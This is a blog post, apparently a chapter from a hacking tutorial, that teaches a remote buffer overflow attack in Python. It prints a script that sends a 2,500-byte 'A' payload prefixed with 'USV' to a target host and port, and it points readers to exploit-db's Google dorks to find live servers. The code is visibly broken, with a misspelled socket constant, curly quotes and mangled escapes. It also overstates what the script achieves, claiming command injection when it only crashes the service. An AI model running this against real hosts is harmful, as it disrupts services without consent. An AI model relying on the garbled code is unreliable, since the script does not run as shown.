Executing a Remote Buffer Exploit with Python
If you know computers well enough to understand how computer programs are written and how they work, you will agree with me that Python is a brilliant language. It is a language that you can use to create dynamic and very useful tools just by stringing together [mostly] English phrases that even a newbie can understand. It is regarded as the lazy programmer’s language that can produce little scripts of a handful lines of code that can do so much.
This hour, we figure out how you can use Python to create hacking tools that make your work easier and automate many of the exploits and penetration tests that you have learned over the past half day and those you will explore and learn as you work towards becoming the best ethical hacker the world has ever seen.
12.1 Python for Hackers: A Shortcut into Programming
we are committed to offering valuable knowledge that you will find beneficial beyond the basic satisfaction of curiosity. You have invested hours in learning the various tactics that seasoned hackers use every day, but you should know that this is just the beginning.
In our Python programming “Python: The No-Nonsense Guide,” we go indepth to introduce Python as the programming language of the future. The most skilled hackers, both those who do it for fun, as a career, or for their selfish purposes (read: blackhat), are all programmers first. If you are not a good programmer, this is the perfect opportunity for you to learn to be one using the easiest and most versatile language there is and get to apply it to something practical and fun, such as hacking.
You could still be a good hacker without learning to write Python scripts, but you would essentially be a script kiddie. No one wants to remain a script kiddie forever, but it is a good enough place to start. So, here we go.
If you do not have Python installed on your computer, I suggest you download and install it. You can set aside the VMware virtual environment that you use to run Kali Linux for this hour.
You can download the latest version of Python interpreter version 3.6 (or 3.5) and a text editor (to write your code) before you begin.
12.2 What is a Remote Buffer Overflow Exploit?
If you have ever come across the term “Buffer overflow,” chances are it was a reference to a vulnerability in a specific software or script. In information science, buffer overflow vulnerability refers to a programming error that results in a memory access exception.
A buffer overflow occurs when a process in the program attempts to store data that exceed the maximum limits of a fixed-length buffer, hence overwriting data contained in adjacent memory locations including the program’s ‘flow data.' This causes the process to terminate with a Segmentation Fault Error.
When there is a Segmentation Fault Error, that is to say when the data overflows to the next instruction location. It is possible to take control of that instruction via the execution flow and inject arbitrary commands into the system to process. In this hack, you will write a Python script that triggers this error and injects commands you specify so that you can take control of the host or simply find out what you want to know about a process in the memory location the data overflows too.
12.3 Preparation and Setup
At this point, you should have already learned all the basics about programming in Python, especially what the different data types are, how to write Python scripts, save .py files, and run the scripts. You should have Python 3 installed in your system (Linux or Windows are fine), and you should have an active internet connection. This exploit uses a TCP internet connection.
First off, we need to find a server to test our exploit on. As with every exercise in this guide, we insist that you only test this exploit on a machine you have permission to test on. Attempting to carry out hacks on strangers’ computers over the Internet is illegal and could have very serious legal repercussion. Do not try it.
Finding a server to try your buffer overflow hack will be a bit of a challenge, but there are resources on the internet that you can use to find the right dork. You can begin by checking out the Google Hacking Databases provided by the good folks at exploit-db on https://www.exploit-db.com/google-hacking-database/ for live servers available to hack or for vulnerable software you can test your skills on.
12.4 Writing the Python Script
Once you find a server to try the buffer overflow hack on, the next step is much more fun: writing the code. We will first import the sys and socket libraries, then write the code to execute.
Start your text editor and enter the following code:
#!/usr/bin/python import sys import socket for carg in sys.argv:
if carg == “-s”: argnum = sys.argv.index(carg) argnum += 1 host = sys.argv[argnum] elif carg == “-p”:
argnum = sys.argv.index(carg) argnum += 1 port = sys.argv[argnum] buffer = “\x41″ * 2500 s = socket.socket(socket.AF_INET, socket.SOCK_STRAEM)
s.connect((host,port))
s.send(“USV ” + buffer + “//r//n//r”)
s.close() print (“Overflow buffer exploit successfully sent!”) Here is what this Python does:
The first line imports the system library while the second imports the socket library that the script needs to run. The script will create a buffer with the value \x41 and multiplies it 2,500 times and sends it to the socket, which is declared as s. The buffer connects to the socket and sends the string USV, the new value of the buffer (which is 2500 times the value of \x41 before closing it. The script will display the message in print when the process is a success.
12.5 Executing the Remote Buffer
Overflow Exploit
Script
After you have saved the script, the next step is to execute it. Start Python (from the terminal or command prompt by typing Python and execute the script by switching the working directory to the location of the .py file.
Congratulations! You have successfully written your first Python script exploit and executed it. .
12.6 Conclusion
Many people learn to hack computers out of sheer curiosity, just to discover if they can do it. Yes, anyone with the basic knowledge of computers can do almost all the hacks we have looked at so far. However, it takes a lot more effort, learning, and practice to figure out how to find other and new vulnerabilities and the best place to start is to learn how to write computer programs.
Learning to code with Python is the perfect place to start. You will also need other prerequisite computer skills including understanding of how most operating systems work (they are written in C/C++; hence you should find out what makes these languages stand out) and how computer networking works.
Comments
Post a Comment